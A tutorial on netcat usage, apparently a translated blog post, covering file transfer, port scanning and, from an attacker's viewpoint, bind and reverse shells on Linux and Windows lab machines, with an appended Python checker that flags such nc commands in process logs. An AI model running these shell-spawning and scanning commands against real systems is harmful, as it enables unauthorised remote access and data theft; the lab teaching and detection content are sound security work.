Netcat, nicknamed the Swiss Army knife
Small in size but big in function: listening, file transfer, telnet, banner grabbing, text file transfer, encryption, remote control, streaming media, remote hard-disk cloning.
Almost every Linux install ships it; just type nc in the shell to check whether it is there:
nc
Format: nc [parameters] ip port [file]
Parameters:
-v: verbose
-n: do not do DNS resolution
-l: listen
-p: port
-q: after the transfer ends (EOF on stdin), wait this many seconds and then quit
Demo: uploading a file (the original uses a Trojan) with nc
ubuntu server: run nc -lp 4444 > 1.txt
nc -lp 4444 > 1.txt
kali: run nc -nv 192.168.176.144 4444 < 1.txt -q 1
nc -nv 192.168.176.144 4444 < 1.txt -q 1
Or the other way round:
kali: run nc -lp 4444 < 2.txt -q 1
nc -lp 4444 < 2.txt -q 1
ubuntu server: run nc -nv 192.168.176.129 4444 > 2.txt
nc -nv 192.168.176.129 4444 > 2.txt
Transferring a directory:
can be used to dump a database off the target server or to upload exploits
kali: run tar -cvf - MITMF/ | nc -lp 4444 -q 1
tar packs the directory first and streams it into nc
tar -cvf - MITMF/ | nc -lp 4444 -q 1
ubuntu server: run nc -nv 192.168.176.129 4444 | tar -xvf -
nc -nv 192.168.176.129 4444 | tar -xvf -
Transfer succeeded; check with
ls
Encrypted file transfer
kali: run nc -lp 444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 3.txt
mcrypt is the encryption tool; --flush deletes after decryption (author's description); -Fbqd are the decryption flags; rijndael-256 is the cipher; -m ecb is the mode. Note that ECB encrypts identical plaintext blocks to identical ciphertext blocks and so leaks patterns; a chained mode such as cbc is the safer choice.
nc -lp 444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 3.txt
ubuntu server: run mcrypt --flush -Fbq -a rijndael-256 -m ecb < 3.txt | nc -nv 192.168.176.129 444 -q 1, which encrypts 3.txt (-Fbq are the encryption flags) and pipes it to the listener
mcrypt --flush -Fbq -a rijndael-256 -m ecb < 3.txt | nc -nv 192.168.176.129 444 -q 1
Streaming media
kali: run cat 1.mp4 | nc -lp 4444
cat 1.mp4 | nc -lp 4444
ubuntu server: run nc -nv 192.168.176.129 4444 | mplayer -vo x11 -cache 3000 -
mplayer is the video player; -vo x11 selects the X11 video output and -cache 3000 buffers 3000 KB of the stream before playing it
nc -nv 192.168.176.129 4444 | mplayer -vo x11 -cache 3000 -
nc as a scanner
Parameter: -z: scan (zero-I/O) mode, probes for open ports
nc -nvz 192.168.176.145 1-65535
-u: UDP port scan
nc -nvzu 192.168.176.145 1-1024
Remote control
Controlled host: nc -lp 4444 -c bash
-c: run bash (the given command is executed through the shell)
Forward (bind) connection:
nc -lp 4444 -c bash
kali: run nc -nv 192.168.176.145 4444
nc -nv 192.168.176.145 4444
Reverse connection
kali: run nc -lp 4444
nc -lp 4444
Target server: run nc -nv 192.168.176.129 4444 -c bash
nc -nv 192.168.176.129 4444 -c bash
For a Windows target
change -c to -e and bash to cmd.exe
On win7 run
nc -lp 4444 -e cmd.exe
On kali run the following and you get the shell directly
nc -nv 192.168.176.128 4444
The reverse connection is the better choice: the target server runs nc -nv <attacker ip> <port> -e cmd.exe,
while the attacker machine first listens with nc -lp <port>, and then the line above is run on the target.
Drawbacks of netcat
1. No authentication: a listener on the compromised host can just as easily be connected to by someone else.
2. No encrypted channel: the traffic is exposed to ARP spoofing, man-in-the-middle attacks and sniffing.
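The lack of authentication above also means these invocations are easy to spot on the host side. As an added defender-side example (not part of the original post), a small Python checker that flags the nc command lines this post lists (shells spawned with -c/-e, -z scans, bare listeners) in a constructed process log; the "pid user cmdline" record format is hypothetical.

```python
import shlex
from typing import Dict, List, Optional

# Constructed sample process records in a hypothetical "pid user cmdline" format.
SAMPLE_LOG = """\
1201 www-data nc -lp 4444 -c bash
1202 root nc -nvzu 192.168.176.145 1-1024
1203 alice nc -nv 192.168.176.129 4444 -e cmd.exe
1204 bob nc -lp 4444
1205 carol tar -cvf - MITMF/ | nc -lp 4444 -q 1
1206 dave cat notes.txt
"""

NC_NAMES = {"nc", "netcat", "ncat", "nc.exe"}

def classify_nc(cmdline: str) -> Optional[str]:
    """Label an nc invocation, or return None when the command line is not nc.
    Most severe first: 'shell-exec' (-c/-e or ncat --exec/--sh-exec spawns a shell),
    'port-scan' (-z), 'listener' (-l with no shell), 'connect' (outbound client)."""
    for segment in cmdline.split("|"):          # nc may sit behind tar/cat in a pipeline
        try:
            argv = shlex.split(segment)
        except ValueError:                       # unbalanced quotes: skip this segment
            continue
        if not argv or argv[0].rsplit("/", 1)[-1] not in NC_NAMES:
            continue
        flags = set()
        for tok in argv[1:]:
            if tok in ("--exec", "--sh-exec"):
                flags.add("e")
            elif tok.startswith("-") and not tok.startswith("--"):
                flags.update(tok[1:])            # bundled flags: -nvz -> {n, v, z}
        if "e" in flags or "c" in flags:
            return "shell-exec"
        if "z" in flags:
            return "port-scan"
        if "l" in flags:
            return "listener"
        return "connect"
    return None

def scan_log(log: str) -> List[Dict[str, str]]:
    """Run classify_nc over every record and collect the findings in log order."""
    findings = []
    for line in log.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmdline = parts
        label = classify_nc(cmdline)
        if label:
            findings.append({"pid": pid, "user": user, "label": label, "cmd": cmdline})
    return findings
```

On the sample log the checker reports five findings and ignores the plain cat command; the process-audit source (auditd execve records, Sysmon event 1, ps output) is whatever the host already collects.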